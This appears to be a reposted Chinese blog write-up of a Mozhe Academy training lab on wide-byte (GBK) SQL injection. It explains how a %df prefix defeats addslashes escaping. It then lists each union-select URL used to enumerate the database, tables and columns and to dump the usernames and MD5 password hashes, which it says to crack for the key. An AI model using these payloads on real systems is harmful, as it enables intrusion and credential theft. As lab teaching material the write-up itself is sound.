墨者学院-----SQL注入漏洞测试(宽字节)

SQL注入漏洞测试(宽字节)

宽字节的注入原理

正常情况下,我们输入单引号会进行测试,这个时候PHP中的addslashes函数会将(单引号,双引号,斜杠\,null字符)
等进行转义。使我们无法闭合单引号。但是如果存在宽字节注入,我们输入==%df’时,单引号会被转义为反斜杠\,URL编码
%5c==。又如果数据库使用GBK字符编码的话,两个字符会编码成一个汉字。带到数据库中查询就是%df%5c转换为汉字
運,从而使单引号逃逸出来。
在这里插入图片描述
输入常规关键字发现页面并没变化,再次输入%df’页面爆出错误
在这里插入图片描述
接下来老步骤,利用联合查询的那一个套路

判断字段数

http://219.153.49.228:45350/new_list.php?id=1%df' order by 5 --+

在这里插入图片描述

判断回显点

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,5 --+

3和5是回显点

利用回显点爆破数据库

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,database() --+

mozhe_discuz_stormgroup
在这里插入图片描述

爆破表,字段和字段内容

notice,stormgroup_member

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database() --+

name,password,status表名改为十六进制

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x73746f726d67726f75705f6d656d626572  --+

mozhe,mozhe

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(name) from stormgroup_member --+

3114b433dece9180717f2b7de56b28a3,
cc108ad52ecbe4ebbee499789b4aac2d

http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(password) from stormgroup_member --+

MD5解密即可成功获取key

猜你喜欢

转载自blog.csdn.net/qq_43590351/article/details/113005470
今日推荐